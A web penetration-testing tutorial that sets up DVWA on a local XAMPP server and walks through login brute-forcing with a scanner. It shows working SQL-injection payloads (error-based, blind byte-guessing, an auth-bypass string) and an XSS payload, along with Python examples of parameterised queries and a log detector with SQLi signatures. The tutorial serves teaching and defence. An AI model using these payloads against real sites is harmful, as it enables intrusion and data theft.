The Practice of Web Application Penetration Testing
1. Building Testing Environment
Intruding into websites is illegal in many countries, so you cannot use other people's websites as your testing target.
First, you need to build a test environment of your own. If you are not experienced at setting up servers, we recommend building a simple one with XAMPP.
OS: Windows 7, 8
Software: XAMPP for Windows, download: https://www.apachefriends.org/zh_cn/index.html
XAMPP for Windows includes modules such as Apache, PHP, Tomcat and MySQL.
The default installation path is C:\xampp; please do not change it.
Taking DVWA (Damn Vulnerable Web Application) as an example: start Apache and MySQL, then browse to http://127.0.0.1 .
Once they are running, you can use the following command to set the MySQL root password to 123456 (this is a weak password used only for illustration; please change it):
C:\xampp\mysql\bin\mysqladmin -u root password 123456
Now download DVWA from https://github.com/RandomStorm/DVWA and unzip it to C:\xampp\htdocs\dvwa.
Then modify its configuration file, C:\xampp\htdocs\dvwa\config\config.inc.php:
$_DVWA[ 'db_server' ] = 'localhost';
$_DVWA[ 'db_database' ] = 'dvwa';
$_DVWA[ 'db_user' ] = 'root';
$_DVWA[ 'db_password' ] = '123456';
$_DVWA['default_security_level'] = "low";
Open http://127.0.0.1/dvwa/setup.php and click "Create/Reset Database" to finish the installation.
Access the front page and it will redirect to http://127.0.0.1/DVWA/login.php .
Now a basic test environment is available.
2. DVWA Brute Force
The first challenge in DVWA is how to log in. Usually you can search the web for the default username/password, or try to bypass the authentication with SQL Injection, for instance with a username like admin';-- , among other methods.
Here we will use brute force, with WebCruiser Web Vulnerability Scanner 3 (http://www.janusec.com/ ) as the brute-force tool.
First, enter an arbitrary username and password, such as 123 and 456, and submit.
Switch to the Resend tab: we find a request list that includes the requests we just submitted.
Note the "Bruter" button; clicking it switches to the Bruter tool.
The username and password fields have been identified automatically.
The dictionary files are located in the same directory as WebCruiserWVS.exe and can be customised.
Click "Go" to start the guessing process; the results are listed in the window.
Log in with the username and password found.
3. SQL Injection
Select the "SQL Injection" menu, input 1 and submit:
Then input 1' to try:
MySQL throws an exception because of the unpaired single quote.
Now we can suspect that there is an SQL Injection vulnerability here.
Continue by trying 1 and 1=1 and 1 and 1=2 .
But the results are not as expected, so integer-type SQL Injection is ruled out.
Continue with 1' and '1'='1 and 1' and '1'='2 .
No result is returned when we input 1' and '1'='2 .
At this point we can conclude that there is a string-type SQL Injection vulnerability here.
Recap: criterion of SQL Injection
Assume the initial response is Response0,
the response after appending true logic is Response1,
the response after appending false logic is Response2.
If Response1 = Response0 but Response1 != Response2, SQL Injection exists.
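To make the recap concrete, here is an added example (not part of the original slides, and not DVWA's own code) that reproduces the pattern in Python with an in-memory SQLite table standing in for DVWA's users table: a query that splices the id into a quoted string, a parameterised version of the same query, and the Response0/Response1/Response2 comparison applied to both with the probes used above. The table rows are constructed sample data.

```python
import sqlite3

# Constructed stand-in for the DVWA "users" table (sample rows, not DVWA's real schema or data).
SAMPLE_USERS = [(1, "admin", "admin"), (2, "Gordon", "Brown"), (3, "Hack", "Me")]


def make_db():
    """Build an in-memory SQLite database with the sample table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id INTEGER, first_name TEXT, last_name TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def query_vulnerable(conn, user_input):
    """String-type context: the input is spliced between single quotes.

    This mirrors the pattern the tutorial exercises at DVWA's 'low' level;
    it is an illustration, not DVWA's own code.
    """
    sql = "SELECT first_name, last_name FROM users WHERE user_id = '%s'" % user_input
    try:
        return conn.execute(sql).fetchall()
    except sqlite3.Error as exc:
        # The unpaired quote in 1' ends up here, like MySQL's exception on the page.
        return "ERROR: %s" % exc


def query_hardened(conn, user_input):
    """Parameterised query: the input is bound as a value and never parsed as SQL."""
    sql = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return conn.execute(sql, (user_input,)).fetchall()


def injection_suspected(run, base, true_probe, false_probe):
    """The page's criterion: Response1 == Response0 and Response1 != Response2."""
    response0, response1, response2 = run(base), run(true_probe), run(false_probe)
    return response0 == response1 and response1 != response2


def run_checks():
    """Apply the criterion with the page's probes to both query styles."""
    conn = make_db()
    string_probes = ("1", "1' and '1'='1", "1' and '1'='2")
    integer_probes = ("1", "1 and 1=1", "1 and 1=2")
    return {
        # unpaired quote -> SQL syntax error from the vulnerable query
        "quote_error": query_vulnerable(conn, "1'"),
        # integer-type probes fail in a string context: each probe is compared as one literal
        "vulnerable_integer": injection_suspected(lambda p: query_vulnerable(conn, p), *integer_probes),
        # string-type probes satisfy the criterion against the concatenated query ...
        "vulnerable_string": injection_suspected(lambda p: query_vulnerable(conn, p), *string_probes),
        # ... but not against the parameterised one, which returns nothing for both probes
        "hardened_string": injection_suspected(lambda p: query_hardened(conn, p), *string_probes),
        "hardened_true_probe": query_hardened(conn, "1' and '1'='1"),
    }


if __name__ == "__main__":
    for name, value in run_checks().items():
        print(name, "->", value)
```

Against the concatenated query the string-type probes satisfy the criterion and the integer-type probes do not, which is what the slides observe. Against the parameterised query both probes return nothing, so the criterion fails: binding the value is the fix whose absence the criterion detects.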
OK, can you retrieve some data by exploiting it?
Try: http://127.0.0.1/dvwa/vulnerabilities/sqli/?Submit=Submit&id=1' and (select 1 from ( select count(*),concat((select database()),0x3a,floor(rand(0)*2)) x from information_schema.tables group by x)a)%23
The database name "dvwa" is returned on the page.
This case is a little complex: it intentionally provokes an exception through the double rand() computation, so the database name is carried in the error.
Another way is blind SQL Injection, guessing the length and then the ASCII code of each byte of the field.
To test whether the database name is longer than 10 characters:
http://127.0.0.1/dvwa/vulnerabilities/sqli/?Submit=Submit&id=1' and (select char_length(database()))>10 and '1'='1
False; try less than 10:
http://127.0.0.1/dvwa/vulnerabilities/sqli/?Submit=Submit&id=1' and (select char_length(database()))<10 and '1'='1
True; keep narrowing the guess until:
http://127.0.0.1/dvwa/vulnerabilities/sqli/?Submit=Submit&id=1' and (select char_length(database()))=4 and '1'='1
So the length is 4.
Now guess each byte of it:
http://127.0.0.1/dvwa/vulnerabilities/sqli/?Submit=Submit&id=1' and (select ord(substr(database(),1,1)) )=100 and %271%27=%271
The ASCII code of the first byte is 100, which is d; and so on:
http://127.0.0.1/dvwa/vulnerabilities/sqli/?Submit=Submit&id=1' and (select ord(substr(database(),2,1)) )=118 and %271%27=%271 , the second byte is v.
http://127.0.0.1/dvwa/vulnerabilities/sqli/?Submit=Submit&id=1' and (select ord(substr(database(),3,1)) )=119 and %271%27=%271 , the third byte is w.
http://127.0.0.1/dvwa/vulnerabilities/sqli/?Submit=Submit&id=1' and (select ord(substr(database(),4,1)) )=97 and %271%27=%271 , the fourth byte is a.
So the full database name is "dvwa".
Is there a tool that can run these tests for us?
Yes, a web application security scanner can do it.
Taking WebCruiser as an illustration, navigate to the page and click "ScanURL":
SQL Injection vulnerabilities are found. Right-click a vulnerability, select "SQL INJECTION POC", then click "Get Environment Information":
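The brute-force attempt in section 2 and the blind-injection probes in this section both leave characteristic traces in the web server's access log. The following is an added example (not from the original slides, and not a WebCruiser feature) in Python: it parses constructed Apache combined-format log lines (sample traffic, not a real capture), flags requests whose decoded query string contains the functions used by the probes above, and reports any source that posts to /dvwa/login.php more than a threshold number of times within a sliding window. The signature list, the 60-second window and the threshold of 10 are assumptions chosen for the sample.

```python
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import unquote

# Constructed Apache combined-format log lines: a burst of 12 login POSTs from one
# address, then one normal login, one benign query and the two probe URLs from the page.
BRUTE_FORCE_LINES = "\n".join(
    f'10.0.0.5 - - [10/May/2024:10:00:{s:02d} +0000] "POST /dvwa/login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"'
    for s in range(12)
)
SAMPLE_LOG = BRUTE_FORCE_LINES + "\n" + """\
127.0.0.1 - - [10/May/2024:10:04:00 +0000] "POST /dvwa/login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
127.0.0.1 - - [10/May/2024:10:04:30 +0000] "GET /dvwa/vulnerabilities/sqli/?Submit=Submit&id=1 HTTP/1.1" 200 4321 "-" "Mozilla/5.0"
127.0.0.1 - - [10/May/2024:10:05:00 +0000] "GET /dvwa/vulnerabilities/sqli/?Submit=Submit&id=1%27%20and%20(select%20char_length(database()))%3E10%20and%20%271%27=%271 HTTP/1.1" 200 4100 "-" "Mozilla/5.0"
127.0.0.1 - - [10/May/2024:10:05:10 +0000] "GET /dvwa/vulnerabilities/sqli/?Submit=Submit&id=1%27%20and%20(select%20ord(substr(database(),1,1))%20)=100%20and%20%271%27=%271 HTTP/1.1" 200 4100 "-" "Mozilla/5.0"
"""

# Apache combined format: ip ident user [timestamp] "METHOD path protocol" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Functions and fragments the blind/error-based probes on the page rely on (assumed list;
# matched case-insensitively against the percent-decoded request line).
SQLI_SIGNATURES = ("char_length(", "ord(substr(", "information_schema", "floor(rand(", "'1'='1", "'1'='2")


def parse_line(line):
    """Parse one combined-format line; return None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["ts"] = datetime.strptime(entry["ts"], "%d/%b/%Y:%H:%M:%S %z")
    # Decode once so %27 becomes a quote; double-encoded input would need a second pass.
    entry["decoded"] = unquote(entry["path"]).lower()
    return entry


def find_sqli_probes(entries):
    """Return (ip, raw path, matched signatures) for every request carrying a probe fragment."""
    hits = []
    for e in entries:
        matched = [s for s in SQLI_SIGNATURES if s in e["decoded"]]
        if matched:
            hits.append((e["ip"], e["path"], matched))
    return hits


def find_login_bursts(entries, login_path="/dvwa/login.php", window_s=60, threshold=10):
    """Map ip -> peak number of login POSTs inside any window_s-second window, if >= threshold."""
    per_ip = defaultdict(list)
    for e in entries:
        if e["method"] == "POST" and e["path"] == login_path:
            per_ip[e["ip"]].append(e["ts"])
    bursts = {}
    for ip, times in per_ip.items():
        times.sort()
        best, start = 0, 0
        for end in range(len(times)):
            # Slide the window start forward until it spans at most window_s seconds.
            while (times[end] - times[start]).total_seconds() > window_s:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            bursts[ip] = best
    return bursts


def analyse(log_text):
    """Run both detections over a block of log text."""
    entries = [e for e in (parse_line(l) for l in log_text.splitlines()) if e]
    return {"sqli_probes": find_sqli_probes(entries), "login_bursts": find_login_bursts(entries)}


if __name__ == "__main__":
    result = analyse(SAMPLE_LOG)
    for ip, path, sigs in result["sqli_probes"]:
        print("SQLi probe from", ip, sigs, path)
    for ip, count in result["login_bursts"].items():
        print("login burst from", ip, "-", count, "POSTs")
```

The scanner's requests in section 3 would produce the same kind of entries at much higher volume; the stored XSS payload in the next section is sent by POST and therefore does not appear in the request line, so it needs body logging or an application-level control rather than this check.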
4. XSS
Select XSS from the menu:
http://127.0.0.1/dvwa/vulnerabilities/xss_s/
Enter text and script directly into the title and content fields, such as:
testinput<img src=0 onerror="alert(123456)">
Or use the scanner, which finds 2 XSS vulnerabilities.
Note: to improve efficiency, WebCruiser Web Vulnerability Scanner can scan a designated vulnerability type (via settings) or a designated URL (ScanURL button) separately.
